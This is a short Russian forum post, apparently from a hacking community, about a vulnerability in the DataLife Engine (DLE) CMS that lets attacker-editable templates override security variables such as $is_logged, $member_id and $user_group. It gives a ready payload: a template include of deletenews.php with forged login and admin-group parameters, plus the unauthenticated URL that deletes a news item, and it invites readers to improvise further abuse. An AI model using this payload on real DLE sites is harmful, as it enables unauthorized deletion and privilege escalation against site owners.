Последняя офф. уязвимость очень жёсткая: переопределение множества переменных возможно через файлы шаблонов.
Необходимо иметь возможность редактировать шаблоны
Целка опасается за переменные:
$file_path
$file_name
$is_logged
$member_id
$cat_info
$config
$user_group
$category_id
$smartphone_detected
$dle_module
Их то и можно переопределить в шаблоне, обратившись к тому файлу, в которых они явно не заданы.
Но на самом деле, этих переменных гораздо больше, они закрыли лишь явно самые опасные.
Пример:
Этот простой запрос, без авторизации на сайте
удалит новость с id=2
Запрос: http://site.ru/?hash=111&id=2
Изменения в файле: main.tpl:
Код HTML:
HTML:
{include file="engine/modules/deletenews.php?is_logged=1&member_id[user_group]=1&dle_login_hash=111&hash=111"}
Дальше всё зависит от вашей фантазии и знания языка. Держись, ДЛЕ